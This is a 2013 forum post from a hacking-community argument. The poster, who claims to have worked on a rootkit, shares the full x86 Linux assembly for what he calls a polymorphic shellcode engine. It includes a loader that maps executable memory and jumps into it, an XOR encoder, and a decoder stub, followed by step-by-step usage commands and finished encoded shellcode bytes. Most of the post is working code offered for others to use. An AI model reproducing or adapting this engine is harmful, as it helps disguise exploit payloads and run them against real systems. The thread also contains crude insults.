Quote (Faithful @ Mar 20 2013 11:16pm)
I wouldn't take the time to look at your shitty code to figure it out. lol. If you're a somebody, please, show me a live version of your work that you were paid for. If not you're like 99% of nerds that think they are something and never end up being remotely successful. You're a hobbyist. Get over yourself.
Enjoy riding each others dicks, fellas. It's very becoming of you.
what would you like to see. i have plenty of shellcode for 64bit and 32bit linux systems i was paid to write as well as taking part in the jynx2 rootkit as well as other products such as abduction which is an anti software theft module. most of my unpaid work is free to others via blackhatlibrary.net which is currently offline due to the datacenters raid controller dieing.
just as a little teaser here is my 32bit polymorphic shellcode engine i wrote.
loader.s (loads shellcode into memory and jumps to it to test it)
Code
.section .data
.section .text
.global _start
_start:
pop %edi
pop %edi
pop %edi #get arg1 pointer (shellcode)
push $90
pop %eax #mmap() syscall number
xor %ebx, %ebx
push %ebx
push %ebx #args 5/6 (null)
push $0x22 #arg 4
push $0x7 #arg 5
push %ebx
pop %ecx
inc %ecx
shl $0x12, %ecx
push %ecx #arg2 (0x1000)
push %ebx #arg1 (null)
mov %esp, %ebx #move pointer to args to ebx for mmap()
int $0x80
inject:
xor %esi, %esi
push %esi
pop %edx #zero out esi and edx
inject_loop:
cmpb %dl, (%edi, %esi, 1)
je inject_finished
movb (%edi, %esi, 1), %cl
movb %cl, (%eax, %esi, 1)
inc %esi
jmp inject_loop #places shellcode into mmap() memory
ret_to_shellcode:
push %eax #pushes mmap memory address and returns to it
ret
inject_finished:
inc %esi
movb $0xc3, (%eax, %esi, 1) #adds ret to the code code so that loader can exit
call ret_to_shellcode
exit:
xor %eax, %eax
mov %eax, %ebx
inc %eax
int $0x80 #exit
encoder.s (takes a bytecode string and encodes it for use in the poly engine.)
Code
.section .data
.section .text
.global _start
_start:
pop %ecx
pop %ecx
pop %ecx #arg1 pointer
xor %ebx, %ebx
push %ebx
pop %edx #zero out ebx and edx
count_chars:
cmpb %dl, (%ecx, %ebx, 1)
je write
xor $0x3, (%ecx, %ebx, 1)
inc %ebx
jmp count_chars #counts characters and xor encode them
write:
push $4
pop %eax
mov %ebx, %edx
push $2
pop %ebx
int $0x80 #writes encoded chars to stdout
exit:
xor %eax, %eax
mov %eax, %ebx
inc %eax
int $0x80 #exits
the decoder.s (to decode the encoded payload and jump to it in memory)
Code
.section .data
.section .text
.global _start
_start:
jmp start
inject:
pop %ecx #pop the return address
pop %ebx #pop the encoded shellcode start address
pop %eax #pop the mmaped memory address
xor %edx, %edx
push %edx
pop %ecx #zero out edx and ecx (which holds the return address)
inject_loop:
cmpb $0x20, (%ebx, %edx, 1)
je inject_finished
movb (%ebx, %edx, 1), %cl
xor $0x3, %cl
movb %cl, (%eax, %edx, 1)
inc %edx
jmp inject_loop
inject_finished:
inc %edx
movb $0xc3, (%eax, %edx, 1)
push %ecx
push %eax
ret
getpc:
mov (%esp), %eax
ret
start:
call getpc #find ourself on stack
mov %eax, %edx
add $0x2a, %edx #add decoder length to find shell beginging
push $90
pop %eax #mmap() syscall
xor %ebx, %ebx
push %ebx
push %ebx #arg 5/6
push $0x22 #arg 4
push $0x7 #arg 3
push %ebx
pop %ecx
inc %ecx
shl $0x12, %ecx
push %ecx #arg2 0x1000
push %ebx #arg 1
mov %esp, %ebx
int $0x80
push %eax #push mmap pointer
push %edx #push our shellcode begining
call inject
exit:
xor %eax, %eax
mov %eax, %ebx
inc %eax
int $0x80
and finally if you need a little readme if you are to dumb to follow along.
Code
useage:
1) create your payload (you can use test_shellcode.s to test)
2) assemble and link your shellcode
as test_shellcode.s -o test_shellcode.o
ld test_shellcode.o -o test_shellcode
3) run this command on your linked shellcode
objdump -d test_shellcode | grep 8048 | grep -v ">:" | cut -f2 | perl -p -e 's/ [ \n]*/\\x/g'
output: 31\xc0\x40\x89\xc3\xcd\x80\x
fix output: \x31\xc0\x40\x89\xc3\xcd\x80
4) run shellcode through encoder
./encoder "$(echo -en "\x31\xc0\x40\x6a\x42\x5b\xcd\x80")" &> hex; cat hex |hexdump -C |sed 's/^[0-9a-f]........//g' |sed 's/|.*|$//g' |sed 's/ / /g' |sed 's/ /\\x/g' |sed 's/\\x\\x//g' |sed 's/\\x$//g' |grep x |awk '{printf("%s ", $0)}' |sed 's/ //g'
output: \x32\xc3\x43\x69\x41\x58\xce\x83
5) affix encoded shellcode to end of decoder stub and append \x20 terminator (can be obtained via code in step 3 just replace test_shellcode with decoder binary)
output: \xeb\x25\x59\x5b\x58\x31\xd2\x52\x59\x80\x3c\x13\x20\x74\x0c\x8a\x0c\x13\x80\xf1\x03\x88\x0c\x10\x42\xeb\xee\x42\xc6\x04\x10\xc3\x51\x50\xc3\x8b\x04\x24\xc3\xe8\xf7\xff\xff\xff\x89\xc2\x83\xc2\x2a\x6a\x5a\x58\x31\xdb\x53\x53\x6a\x22\x6a\x07\x53\x59\x41\xc1\xe1\x12\x51\x53\x89\xe3\xcd\x80\x50\x52\xe8\xb3\xff\xff\xff\x31\xc0\x50\x5b\x40\xcd\x80\x32\xc3\x43\x69\x41\x58\xce\x83\x20
6) test payload with loader
./loader "$(echo -en "\xeb\x25\x59\x5b\x58\x31\xd2\x52\x59\x80\x3c\x13\x20\x74\x0c\x8a\x0c\x13\x80\xf1\x03\x88\x0c\x10\x42\xeb\xee\x42\xc6\x04\x10\xc3\x51\x50\xc3\x8b\x04\x24\xc3\xe8\xf7\xff\xff\xff\x89\xc2\x83\xc2\x2a\x6a\x5a\x58\x31\xdb\x53\x53\x6a\x22\x6a\x07\x53\x59\x41\xc1\xe1\x12\x51\x53\x89\xe3\xcd\x80\x50\x52\xe8\xb3\xff\xff\xff\x31\xc0\x50\x5b\x40\xcd\x80\x32\xc3\x43\x69\x41\x58\xce\x83\x20")"; echo $?
output: 66
This post was edited by AbDuCt on Mar 20 2013 09:26pm